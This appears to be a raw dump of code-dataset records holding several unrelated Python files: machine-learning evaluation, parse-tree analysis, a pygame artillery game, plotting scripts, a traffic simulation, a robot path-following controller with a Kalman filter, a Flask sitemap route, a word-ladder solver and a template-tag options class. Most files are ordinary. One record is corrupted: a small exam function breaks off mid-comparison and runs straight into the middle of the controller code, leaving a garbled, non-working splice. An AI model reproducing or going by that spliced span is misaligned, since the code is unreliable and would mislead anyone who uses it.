5575 files in 2.3635379592577617 mins","sub_path":"src/parser_useless/xmlCleaner.py","file_name":"xmlCleaner.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"189072420","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn import metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import cross_val_score\n\ndataframe = pd.read_excel('D:\\pythonProject2\\clinical_dataset.xlsx')\ndata = dataframe.columns.values.tolist()\ndf = dataframe[data[0:9]]\ndf = (df - df.min()) / (df.max() - df.min())\n\ndata2 = df.values\nX = data2[:, 0:9]\ny = dataframe['Status']\nY = []\nfor i in y:\n if (i == \"healthy\"):\n Y.append(0)\n else:\n Y.append(1)\nY = np.array(Y)\n\nhidden_layer = [50, 500, 1000]\nX2 = np.array(X)\nY2 = np.array(Y)\nfor i in hidden_layer:\n ANNModel = MLPClassifier(hidden_layer_sizes=[i, i], activation='logistic', solver='lbfgs', random_state=1,\n alpha=0.1, max_iter=200)\n cv = sklearn.model_selection.KFold(n_splits=10, shuffle=True, random_state=1)\n scores = cross_val_score(ANNModel, X2, Y2, cv=cv)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (i, scores.mean()))\n\ntree_num = [20, 500, 10000]\nX3 = np.array(X)\nY3 = np.array(Y)\nfor j in tree_num:\n ForestModel = RandomForestClassifier(n_estimators=j, min_samples_split=5, bootstrap=True)\n cv = sklearn.model_selection.KFold(n_splits=10, shuffle=True, random_state=1)\n scores2 = cross_val_score(ForestModel, X3, Y3, cv=cv)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (j, scores2.mean()))\n\n","sub_path":"Forest4.py","file_name":"Forest4.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"477253040","text":"\"\"\"Calculates the mean difference between the depth of the sentence in the\ngold standard parses and the prediced model parses\"\"\"\nimport numpy as np\n\n# get the gold standard tree depths from the gold standard parses\nGOLD_DEPTH = []\nfor line in open(\"gold_parses_tree_depth.txt\", \"r\"):\n line = line.strip()\n max_depth = 0\n n_open = 0\n n_closed = 0\n # maximum depth = maximum difference between open and closed parentheses counts\n for char in line:\n if char == \"(\":\n n_open += 1\n if char == \")\":\n n_closed += 1\n if n_open - n_closed > max_depth:\n max_depth = n_open - n_closed\n GOLD_DEPTH.append(max_depth)\n\n# get the test sentence depths\nTEST_DEPTH = []\nsent_num = -1\nsentences = {}\nfor line in open(\"bllip_tree_depth.txt\", \"r\"):\n line = line.split(\"\\t\")\n # we take this to be the border between two sets of particle parses and weights\n if len(line) < 2:\n sent_num += 1\n # if we have collected a set of particle parses, sort them by probability and take the most probable\n if sentences:\n line = [k for k, v in sorted(sentences.items(), key=lambda x : x[1])][-1]\n max_depth = 0\n n_open = 0\n n_closed = 0\n # calculate the depth of the most probable parse as we did for the gold standard ones\n for char in line:\n if char == \"(\":\n n_open += 1\n if char == \")\":\n n_closed += 1\n if n_open - n_closed > max_depth:\n max_depth = n_open - n_closed\n TEST_DEPTH.append(max_depth)\n sentences = {}\n # if we haven't reached a break yet, store the particle and its weight\n else:\n sentences[line[0]] = float(line[1])\n\n#calculate the differences between the gold and test depth\nDIFFERENCES = np.asarray([GOLD_DEPTH[i]-TEST_DEPTH[i] for i in range(len(GOLD_DEPTH))])\n\nprint(f\"On average, gold parses are {np.mean(DIFFERENCES)} deeper than predicted parses (stderr = {np.std(DIFFERENCES)/np.sqrt(len(DIFFERENCES))})\")\n\n\n","sub_path":"analysis/tree_depth/tree_depth.py","file_name":"tree_depth.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"412536896","text":"\"\"\"\nUtility to get the date of meetups.\nWritten by Bede Kelly for Exercism.\n\"\"\"\nimport datetime\nfrom calendar import monthrange\n__author__ = \"Bede Kelly\"\n\ndef meetup_day(year, month, weekday, selector):\n \"\"\"Returns the date of a meetup.\"\"\"\n teenth_days = range(13, 20) # 20th not included.\n weekdays = [\"Mon\", \"Tues\", \"Wednes\", \"Thurs\", \"Fri\", \"Satur\", \"Sun\"]\n weekdays = [i + \"day\" for i in weekdays]\n if selector == \"teenth\":\n for day in teenth_days:\n date = datetime.date(year, month, day)\n if weekday == weekdays[date.weekday()]:\n return date\n else:\n selectors = {\n \"1st\": 0,\n \"2nd\": 1,\n \"3rd\": 2,\n \"4th\": 3,\n \"last\": -1\n }\n index = selectors[selector]\n number_days = monthrange(year, month)[1]\n dates_range = range(1, number_days+1)\n\n all_dates = [datetime.date(year, month, day) for day in dates_range]\n possible_dates = [d for d in all_dates\n if d.weekday() == weekdays.index(weekday)]\n return datetime.date(year, month, possible_dates[index].day)\n","sub_path":"all_data/exercism_data/python/meetup/b0832682e654426faad06b7964bde2be.py","file_name":"b0832682e654426faad06b7964bde2be.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"87966006","text":"import pygame\nimport text_input as ti\nfrom sprites import *\nfrom settings import *\nfrom functions import *\nfrom pygame.locals import *\n\nimport class_textDisplay as textDisplay\ntext = textDisplay.TextDisplay()\n\n# Import needed to center PyGame's window\nimport os\n# Code to center PyGame window on the screen\nos.environ['SDL_VIDEO_CENTERED'] = '1'\n\n# INITIALIZING\n# ==============================================================================\n# PyGame initialization:\npygame.init()\npygame.display.set_caption(windowTitle)\n\n# Screen settings:\nscreen = pygame.display.set_mode(screen_size, 0, 32)\n\n# Setting up FPS:\nclock = pygame.time.Clock()\n\n# Player walk setting:\nspriteCount = 0\n\n# Bomb settings:\nbomb = bomb_crash\n\n# MAIN LOOP\n# ==============================================================================\nrunning = True\nwhile running:\n # Sets game FPS:\n clock.tick(framesPerSecond)\n\n # Main screen:\n if game_screen == \"Main Screen\":\n # Loops through game events\n for event in pygame.event.get():\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if start_button.buttonClick():\n game_screen = \"Player 1 Name\"\n\n if settings_button.buttonClick():\n pass\n\n if exit_button.buttonClick():\n running = False\n\n # Drawing the background:\n screen.fill(GRAY)\n button_group.draw(screen)\n\n text.displayTextMainMenu(\"Avengers\", WHITE, screen, screen_size, \"top_center2\")\n\n # Updates stuff:\n pygame.display.update()\n\n # Player 1 name screen:\n elif game_screen == \"Player 1 Name\":\n\n # Getting game's events:\n events = pygame.event.get()\n # Loops through game events\n for event in events:\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the ENTER key:\n if event.key == pygame.K_RETURN:\n # Only proceeds if the player typed something:\n if len(player_1.name) != 0:\n # Changes screen:\n game_screen = \"Player 2 Name\"\n\n # Drawing the background:\n screen.fill(GRAY)\n\n # Displaying basic text:\n text.displayTextNameScreen(\"Please input player's 1 name (Press ENTER when ready):\",\n WHITE, screen, screen_size, \"center_top3\")\n\n # Displaying and getting player's name:\n player_1.name = ti.textInputBox(player_1.name, WHITE,\n screen, screen_size, events, text.font_36)\n\n # Updates stuff:\n pygame.display.update()\n\n # Player 2 name screen:\n elif game_screen == \"Player 2 Name\":\n\n # Getting game's events:\n events = pygame.event.get()\n # Loops through game events\n for event in events:\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the ENTER key:\n if event.key == pygame.K_RETURN:\n # Only proceeds if the player typed something:\n if len(player_2.name) != 0:\n # Changes screen:\n game_screen = \"Playing\"\n\n # Drawing the background:\n screen.fill(GRAY)\n\n # Displaying basic text:\n text.displayTextNameScreen(\"Please input player's 2 name (Press ENTER when ready):\",\n WHITE, screen, screen_size, \"center_top3\")\n\n # Displaying and getting player's name:\n player_2.name = 
ti.textInputBox(player_2.name, WHITE,\n screen, screen_size, events, text.font_36)\n\n # Updates stuff:\n pygame.display.update()\n\n # Playing screen:\n elif game_screen == \"Playing\":\n\n # Checking for collisions with the terrain:\n if terrainCollision == True:\n if pygame.sprite.spritecollide(player_1, terrain.terrain_group, False):\n player_1.rect.y -= 4\n player_1.standing = True\n\n else:\n player_1.standing = False\n\n if pygame.sprite.spritecollide(player_2, terrain.terrain_group, False):\n player_2.rect.y -= 4\n player_2.standing = True\n\n else:\n player_2.standing = False\n\n if pygame.sprite.spritecollide(bomb, terrain.terrain_group, True):\n bomb.rect.y += 10\n if pygame.sprite.spritecollide(bomb, terrain.terrain_group, True):\n lastBombPosition = bomb.rect.center\n bombHit = True\n bomb.stop_movement()\n\n # Gets mouse position:\n mousePosition = pygame.mouse.get_pos()\n\n # Checking for pressed keys:\n pressed_keys = pygame.key.get_pressed()\n\n # Loops through game events\n for event in pygame.event.get():\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a mouse button press:\n if event.type == pygame.MOUSEBUTTONDOWN:\n if bomb.moving == False:\n if playerTurn == \"1\":\n # Gets bomb's stats and launches it:\n getBombStats(bomb, player_1, mousePosition)\n # Sets the current play as not done yet:\n done = False\n\n elif playerTurn == \"2\":\n # Gets bomb's stats and launches it:\n getBombStats(bomb, player_2, mousePosition)\n # Sets the current play as not done yet:\n done = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the number 1:\n if event.key == pygame.K_1:\n if bomb.moving == False:\n bomb = bomb_crash\n bomb_group.empty()\n bomb_group.add(bomb_crash)\n\n # Checks if the key pressed was the number 2:\n if event.key == pygame.K_2:\n if bomb.moving == False:\n bomb = bomb_pokeball\n bomb_group.empty()\n bomb_group.add(bomb_pokeball)\n\n # Checks if the key pressed was the number 3:\n if event.key == pygame.K_3:\n if bomb.moving == False:\n bomb = bomb_purpleball\n bomb_group.empty()\n bomb_group.add(bomb_purpleball)\n\n # Checks if the key pressed was the number 4:\n if event.key == pygame.K_4:\n if bomb.moving == False:\n bomb = bomb_crazy\n bomb_group.empty()\n bomb_group.add(bomb_crazy)\n\n # Checks if the key pressed was the number 5:\n if event.key == pygame.K_5:\n if bomb.moving == False:\n bomb = bomb_neutron\n bomb_group.empty()\n bomb_group.add(bomb_neutron)\n\n # Players turn:\n if playerTurn == \"1\":\n # If pressed key is D:\n if pressed_keys[K_d] and not bomb.moving:\n player_1.move(\"right\")\n # If pressed key is A:\n if pressed_keys[K_a] and not bomb.moving:\n player_1.move(\"left\")\n\n # Drawing the line between player and mouse position:\n get_distance(player_1.rect.center, mousePosition)\n pygame.draw.line(screen, INFINANCE, player_1.rect.center, mousePosition, 5)\n\n # Checks for collision, if theres is any, stops bomb movement and\n # does damage to the enemy:\n if pygame.sprite.collide_rect(bomb, player_2):\n lastBombPosition = bomb.rect.center\n bombHit = True\n bomb.stop_movement()\n player_2.health -= bomb.damage\n # Checks if there is a winner\n if player_2.health <= 0:\n player_2.health = 0\n winner = player_1.name\n loser = player_2.name\n game_screen = \"Winner Screen\"\n\n if done == False:\n if bomb.moving == False:\n bomb.reset_stats()\n bomb_group, bomb 
= reset_bomb(bomb_group, bomb_crash)\n playerTurn = \"2\"\n done = True\n player_1.movements = 0\n\n elif playerTurn == \"2\":\n # If pressed key is RIGHT arrow:\n if pressed_keys[K_RIGHT] and not bomb.moving:\n player_2.move(\"right\")\n # If pressed key is LEFT arrow:\n if pressed_keys[K_LEFT] and not bomb.moving:\n player_2.move(\"left\")\n\n # Drawing the line between player and mouse position:\n get_distance(player_1.rect.center, mousePosition)\n pygame.draw.line(screen, INFINANCE, player_2.rect.center, mousePosition, 5)\n\n # Checks for collision, if theres is any, stops bomb movement and\n # does damage to the enemy:\n if pygame.sprite.collide_rect(bomb, player_1):\n lastBombPosition = bomb.rect.center\n bombHit = True\n bomb.stop_movement()\n player_1.health -= bomb.damage\n # Checks if there is a winner\n if player_1.health <= 0:\n player_1.health = 0\n winner = player_2.name\n loser = player_1.name\n game_screen = \"Winner Screen\"\n\n if done == False:\n if bomb.moving == False:\n bomb.reset_stats()\n bomb_group, bomb = reset_bomb(bomb_group, bomb_crash)\n playerTurn = \"1\"\n done = True\n player_2.movements = 0\n\n # Drawing the background:\n screen.blit(background.image, (0, 0))\n\n # Draws the terrain:\n terrain.terrain_group.draw(screen)\n\n # Draws the action bar:\n actionBar_group.draw(screen)\n\n # Draws bomb selection indicator:\n if showBombSelector == True:\n if bomb.name == \"crash\":\n selectorPos = (round(actionBar.slot1[0]), round(actionBar.slot1[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"pokeball\":\n selectorPos = (round(actionBar.slot2[0]), round(actionBar.slot2[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"purpleball\":\n selectorPos = (round(actionBar.slot3[0]), round(actionBar.slot3[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"crazy\":\n selectorPos = (round(actionBar.slot4[0]), round(actionBar.slot4[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n elif bomb.name == \"neutron\":\n selectorPos = (round(actionBar.slot5[0]), round(actionBar.slot5[1]))\n selectorRadius = round(actionBar.rect.height/2.5)\n pygame.draw.circle(screen, BLUE, selectorPos, selectorRadius, 2)\n\n # Drawing the players:\n players_group.draw(screen)\n\n # Drawing the bomb:\n if bomb.moving == True:\n bomb_group.draw(screen)\n\n # Drawing the explosion:\n if bombHit == True:\n explosion.animate(lastBombPosition)\n if explosion.displayNumber == 12:\n bombHit = False\n explosion_group.draw(screen)\n\n # Displaying names and health:\n text.displayHealthAndName(WHITE, player_1, screen, screen_size)\n text.displayHealthAndName(WHITE, player_2, screen, screen_size)\n\n # Displaying movements left:\n if playerTurn == \"1\":\n text.displayMovementsLeft(WHITE, screen, 30 - player_1.movements)\n elif playerTurn == \"2\":\n text.displayMovementsLeft(WHITE, screen, 30 - player_2.movements)\n\n # Displaying bomb's speed and angle:\n if playerTurn == \"1\":\n speed = round(get_distance(player_1.rect.center, mousePosition), 2)\n if speed > bomb.maxSpeed:\n speed = bomb.maxSpeed\n angle = round(get_angle(player_1.rect.center, mousePosition, \"degrees\"), 2)\n text.displayDistance(WHITE, screen, speed, angle, 
mousePosition)\n elif playerTurn == \"2\":\n speed = round(get_distance(player_2.rect.center, mousePosition), 2)\n if speed > bomb.maxSpeed:\n speed = bomb.maxSpeed\n angle = round(get_angle(player_2.rect.center, mousePosition, \"degrees\"), 2)\n text.displayDistance(WHITE, screen, speed, angle, mousePosition)\n\n # Updates stuff:\n bomb.update()\n player_1.gravityFall()\n player_2.gravityFall()\n pygame.display.update()\n\n # Winner's screen:\n elif game_screen == \"Winner Screen\":\n # Loops through game events\n for event in pygame.event.get():\n # If event is QUIT (Window close)\n if event.type == QUIT:\n # Sets playing state to false, thus quitting the main loop\n running = False\n\n # Checks if there was a key press:\n if event.type == pygame.KEYDOWN:\n # Checks if the key pressed was the ENTER key:\n if event.key == pygame.K_RETURN:\n # Resets player's health:\n player_1.resetPlayer()\n player_2.resetPlayer()\n\n # Changes screen:\n game_screen = \"Main Screen\"\n\n # Drawing the background:\n screen.fill(GRAY)\n\n # Displaying basic text:\n text.displayTextWinnerScreen(\"Congratulations!\",\n WHITE, screen, screen_size, \"center_top3\")\n # Displaying who won:\n text.displayWhoWon(GREEN, winner, loser, screen, screen_size,\n \"center_top\")\n\n # Updates stuff:\n pygame.display.update()\n\n\n# Quits the game:\npygame.display.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
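main.py imports get_distance and get_angle from functions.py, which is not shown: launch speed is the cursor distance from the player (clamped to bomb.maxSpeed) and the launch angle is measured toward the cursor. A plausible sketch of those helpers, assuming pygame's y-down screen coordinates; only the names come from the code above, the bodies are my guess:

import math

def get_distance(a, b):
    return math.hypot(b[0] - a[0], b[1] - a[1])

def get_angle(a, b, unit="radians"):
    # screen y grows downward, so flip the vertical term to get a math angle
    ang = math.atan2(a[1] - b[1], b[0] - a[0])
    return math.degrees(ang) if unit == "degrees" else ang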
+{"seq_id":"475572242","text":"import csv\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import datetime\r\nfile_name ='C:/Users/Ismail/Python Challange/Data Scienc/Python Crash Courses/Day Three/haye.csv'\r\n\r\n## opening the file \r\nwith open(file_name) as file_object :\r\n weather_data = csv.reader(file_object)\r\n headers = next(weather_data)\r\n print(headers)\r\n\r\n## Print the index and the value of the headers \r\n\r\nfor index, values in enumerate(headers):\r\n print(index,values)\r\n\r\n### Printing the temperature data\r\ntemperature =[]\r\nwith open (file_name) as file_object:\r\n data_holder = csv.reader(file_object)\r\n header_row= next(data_holder)\r\n\r\n for row in data_holder:\r\n temperature_col = row[6]\r\n temperature.append(temperature_col)\r\n print(temperature)\r\n\r\n##ploting the temperature data \r\n\r\nfig,ax = plt.subplots()\r\nax.set_title(\"July Temperature\")\r\nax.set_ylabel(\"Temperature\")\r\nax.plot(temperature)\r\n##plt.show()\r\n\r\n## Reading the dates\r\n\r\nDates =[]\r\n\r\nwith open(file_name) as dates :\r\n taarikh = csv.reader(dates)\r\n header = next(taarikh)\r\n\r\n for i in taarikh :\r\n date_col = i[3]\r\n Dates.append(date_col)\r\n print(Dates)\r\n\r\n##plot the date \r\nfig,ax = plt.subplots()\r\nax.set_title(\"July Month\")\r\nax.plot(Dates,Dates)\r\n##plt.show()\r\n\r\nplt.style.use(\"seaborn\")\r\nfig,ax = plt.subplots()\r\nax.plot(Dates,temperature)\r\nplt.title(\" Daily temperatures in July\")\r\nplt.xlabel('',fontsize=12)\r\nfig.autofmt_xdate()\r\nplt.ylabel(\"Temperature\")\r\nplt.show()","sub_path":"Python Crash Courses/Day Three/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"225802056","text":"import pathlib\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport glob\nfile_dir = 'all_8000_outliers/isotherm/new_isotherm/'\nlist_files=(glob.glob(file_dir + \"*.csv\"))\npc_file = open(file_dir + 'pc_structures.txt', 'w')\nfor a in list_files:\n print(a)\n raw_dataset = pd.read_csv(a)\n structure_name = a.split('.')[0]\n # if the files are in a different directory, need to eliminate the pre-string\n if (\"\\\\\" in structure_name):\n structure_name=structure_name.split('\\\\')[len(structure_name.split('\\\\')) - 1]\n print(structure_name)\n raw_dataset = raw_dataset.sort_values(by = ['Pres'])\n plot_limit_y = max(raw_dataset['Loading'])\n plot_limit_x = max(raw_dataset['Pres']/1e5)\n plt.figure(figsize = (12,10), dpi = 800)\n plt.text(0.05*plot_limit_x,0.95*plot_limit_y, \"Testing Data:\" + structure_name,\n fontsize = 20)\n plt.plot(raw_dataset['Pres']/1e5, raw_dataset['Loading'], '-bo')\n plt.ylabel(r\"GCMC Loading [cm$^{\\rm 3}$/cm$^{\\rm 3}$]\", fontsize = 20)\n plt.xlabel('Pressure [Bar]', fontsize = 20)\n plt.xticks(fontsize = 20)\n plt.yticks(fontsize = 20)\n plt.savefig(file_dir + \"Isotherm_\" + structure_name + \".png\")\n plt.clf()\n # also detect the largest step change in the isotherms\n for b in range(0, raw_dataset.shape[0]-1):\n sort_dataset = raw_dataset.sort_values(by='Pres', ascending=True).reset_index(drop = True)\n change_loading = sort_dataset['Loading'][b + 1] - sort_dataset['Loading'][b]\n if (b == 0):\n stored_loading = change_loading\n stored_index = b\n else:\n if (change_loading > stored_loading):\n stored_loading = change_loading\n stored_index = b\n print(sort_dataset['Loading'][stored_index], sort_dataset['Loading'][stored_index+1])\n pc_file.write(\"%s, %i, %i, %.2f\\n\" % (str(sort_dataset['MOF'][stored_index]), \n sort_dataset['Pres'][stored_index], \n sort_dataset['Pres'][stored_index + 1],\n (sort_dataset['Pres'][stored_index] + sort_dataset['Pres'][stored_index + 1])/2))\n\npc_file.close()","sub_path":"Outlier_stuff_isotherm_analysis/plot_isotherm.py","file_name":"plot_isotherm.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"455853037","text":"from GestionFichiers import *\nfrom FonctionsEssaisVitesseLineaire import *\n\nrho_max = 250\nv_max = 130 / 3.6\nlongueurSegment = 100000\ndureeExperience = 900\nfacteur = 1 + 1e-2\nnbPointsEspace = 25000\ndeltaX = longueurSegment / nbPointsEspace\ndeltaT = deltaX * (1 / (facteur * v_max))\nnbPointsTemps = int(dureeExperience / deltaT)\n\nrho = [rho0(i * deltaX, longueurSegment) for i in range(nbPointsEspace)]\n\nnettoyage(\"results/essaisVitesseLineaire/config/\")\nnettoyage(\"results/essaisVitesseLineaire/calculs/\")\n\necrireParametresDansUnFichier(\"results/essaisVitesseLineaire/config/config.txt\", longueurSegment, dureeExperience, nbPointsEspace, deltaX, deltaT, nbPointsTemps, v_max, rho_max, facteur)\necrireListeDansUnFichier(rho, \"results/essaisVitesseLineaire/calculs/0.txt\")\n\ntemps = 0\n\nfor i in range(1, nbPointsTemps):\n temps = temps + deltaT\n rho = calcul(rho, deltaT, deltaX, v_max, rho_max)\n ecrireListeDansUnFichier(rho, \"results/essaisVitesseLineaire/calculs/\" + str(i) + \".txt\")\n","sub_path":"Vitesse_essai_lineaire/RemplirEssaisVitesseLinaire.py","file_name":"RemplirEssaisVitesseLinaire.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"106883380","text":"def exam27():\n T=int(input())\n for t in range(T):\n n=int(input())\n t=input().split(\" \")\n arr=[]\n out=[]\n out.append(-1)\n for item in t:\n arr.append(int(item))\n for i in range(1,n):\n pre=-1\n for j in range(i):\n if arr[j] math.pi:\n eta -= math.copysign(2*math.pi,eta)\n\ndef true_mes():\n global true_w,prev_pos\n true_w = pos[2] - prev_pos[2]\n prev_pos = np.copy(pos)\n if true_w > 3.0:\n true_w -= 2*math.pi\n if true_w < -3.0:\n true_w += 2*math.pi\n #true_w /= Ts\n true_w /= -nowtime\n\n# Returns Waypoint Index and Distance to Waypoint\ndef waypoint_finder(L1_Dist):\n global pos\n pntarry = pathtree.query_ball_point(pos[:2],L1_Dist, p = 2)\n if not pntarry:\n nL1, waypoint = pathtree.query(pos[:2], k = 1, p = 2)\n else:\n pntarry = np.sort(np.asarray(pntarry))\n pntarry -= wp_num\n waytemp = pntarry[np.where(pntarry>=0)]\n if waytemp.shape[0] == 0:\n waypoint = 0\n else:\n newtemp = np.arange(waytemp[0],waytemp.shape[0]+waytemp[0])\n waypoint = np.amax(np.where(waytemp-newtemp==0))\n waypoint += wp_num\n nL1 = L1_Distance(waypoint) \n return waypoint, nL1\n\ndef animate(i):\n global data, lines\n newdata = np.array([true_w, x_prev[1], pos[2], x_prev[0]])\n if stop != True:\n data = np.append(data, newdata[:,None], axis = 1)\n data = np.delete(data,0,axis = 1)\n for j, line in enumerate(lines):\n line.set_ydata(data[j])\n return lines\n\ndef L1_control_algo():\n global w_cmd, pos, stop, v_cmd, wp_num, nowtime, prevtime, newL1\n\n # Distance ahead of which the waypoint needs to be tracked\n L1 = K_gain*V_norm\n\n # Find the waypoint index at that L1 distance\n # and recompute exact L1 distance\n wp_num, newL1 = waypoint_finder(L1)\n\n #Calculate angle to the waypoint\n Angle(wp_num)\n # print(\"Angle:\",eta)\n # print(\"Waypoint:\",wp_num)\n # print(\"Frame:\", pos[5])\n # print(\"Time delta:\", nowtime)\n\n #Commands:\n if eta > 0.2:\n acc_cmd = (math.sin(eta)*V_norm**2)/newL1\n else:\n acc_cmd = (eta*V_norm**2)/newL1\n # print(\"Sin eta\", math.sin(eta))\n w_cmd = acc_cmd/V_norm**2\n v_cmd = V_norm\n\n # print(\"Omega CMD:\",w_cmd)\n\n\n if newL1<0.01:\n\n print(\"Destination REACHED!!\", newL1)\n stop = 1\n\ndef track_state():\n global untrackcnt, V_norm, w_cmd, v_cmd\n if pos[4] > 0.2:\n untrackcnt = 0\n else:\n untrackcnt += 1\n if untrackcnt>50:\n print(\"UNTRACKED! for {} ms\".format(untrackcnt))\n v_cmd = 0\n w_cmd = 0\n\ndef kalmanfilter():\n global x_prev, P, true_w, nowtime, newL1, R, pos\n\n true_mes()\n\n A = np.array([[1, -nowtime],[0,-nowtime/newL1]])\n x_pred = A.dot(x_prev) + np.array([0, w_cmd])\n\n P_pred = A.dot(P.dot(A.T))\n\n #Update\n if x_pred[0] - pos[2] > 3.0:\n x_pred[0] -= 2*math.pi\n if x_pred[0] - pos[2] < -3.0:\n x_pred[0] += 2*math.pi\n y = np.array([pos[2],true_w]) - x_pred\n\n S = P_pred + R\n K = P_pred.dot(np.linalg.inv(S))\n\n x_new = x_pred + K.dot(y)\n P = (I - K).dot(P_pred)\n\n x_prev = x_new\n\n\n pos[2] = x_prev[0]\n\n # print(\"True Omega:\", true_w)\n # print(\"kalmanfilter Omega:\",x_prev[1])\n # print(\"Angle kalmanfilter:\",ang_est)\n # datastr = \"{},{},{},{},{}\\n\".format(true_w, w_cmd, pos[2], nowtime, newL1)\n # est_store.write(datastr)\n\n\n\n# def filter():\n# pass\n\ndef stop_udp():\n print(\"\\nClosing Ports\\n\")\n for i in range(10000):\n socksend = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n msg = struct.pack('
/sitemap.xml\", methods=[\"GET\"])\ndef year_sitemap(year):\n \"\"\"Generate sitemap.xml \"\"\"\n pages = ['http://www.revitapidocs.com/{year}/'.format(year=year)]\n templates = os.path.join('app', 'templates', str(year))\n for filename in os.listdir(templates):\n url = 'http://www.revitapidocs.com/{year}/{filename}'.format(year=year,\n filename=filename)\n pages.append(url)\n\n sitemap_xml = render_template('sitemap_template.xml', pages=pages, priority=0.5)\n response = make_response(sitemap_xml)\n response.headers[\"Content-Type\"] = \"application/xml\"\n\n return response\n\n\n@app.route(\"/sitemap.xml\", methods=[\"GET\"])\ndef sitemap():\n \"\"\"Generate sitemap.xml \"\"\"\n pages = ['http://www.revitapidocs.com/',\n 'http://www.revitapidocs.com/2015/',\n 'http://www.revitapidocs.com/2016/',\n 'http://www.revitapidocs.com/2017/',\n 'http://www.revitapidocs.com/python/',\n ]\n\n sitemap_xml = render_template('sitemap_template.xml', pages=pages, priority=1.0)\n response = make_response(sitemap_xml)\n response.headers[\"Content-Type\"] = \"application/xml\"\n\n return response\n","sub_path":"app/seo_response.py","file_name":"seo_response.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"419285917","text":"#!/usr/bin/env python3\n\nimport collections\n\nclass Solution:\n # @param start, a string\n # @param end, a string\n # @param dict, a set of string\n # @return an integer\n def ladderLength(self, start, end, dict):\n if start in dict:\n dict.remove(start)\n dict.add(end)\n if len(start) != len(end):\n return 0\n queue = collections.deque([start])\n m = len(start)\n dist = {start: 0}\n while queue:\n curr = queue.popleft()\n if curr == end:\n return dist[curr] + 1\n curr_list = list(curr)\n for i in range(m):\n head = curr[:i]\n tail = curr[i + 1:]\n for ch in 'abcdefghijklmnopqrstuvwxyz':\n if curr[i] == ch:\n continue\n post = head + ch + tail\n if post not in dict:\n continue\n if post not in dist or post in dist and dist[post] > dist[curr] + 1:\n dist[post] = dist[curr] + 1\n queue.append(post)\n return 0\n\ndef main():\n solver = Solution()\n start = 'hit'\n end = 'cog'\n dict = {'hot', 'dot', 'dog', 'lot', 'log'}\n print(solver.ladderLength(start, end, dict))\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"261483617","text":"from classytags.blocks import BlockDefinition\nfrom classytags.compat import compat_basestring\nfrom classytags.parser import Parser\nfrom classytags.utils import StructuredOptions, get_default_name\nfrom django.template import Node\n\n\nclass Options(object):\n \"\"\"\n Option class holding the arguments of a tag.\n \"\"\"\n def __init__(self, *options, **kwargs):\n self.options = {}\n self.breakpoints = []\n self.combined_breakpoints = {}\n current_breakpoint = None\n last = None\n self.options[current_breakpoint] = []\n self.all_argument_names = []\n for value in options:\n if isinstance(value, compat_basestring):\n if isinstance(last, compat_basestring):\n self.combined_breakpoints[last] = value\n self.breakpoints.append(value)\n current_breakpoint = value\n self.options[current_breakpoint] = []\n else:\n self.options[current_breakpoint].append(value)\n self.all_argument_names.append(value.name)\n last = value\n self.blocks = []\n for block in kwargs.get('blocks', []):\n if isinstance(block, BlockDefinition):\n block_definition = block\n elif isinstance(block, compat_basestring):\n block_definition = BlockDefinition(block, block)\n else:\n block_definition = BlockDefinition(block[1], block[0])\n block_definition.validate(self)\n 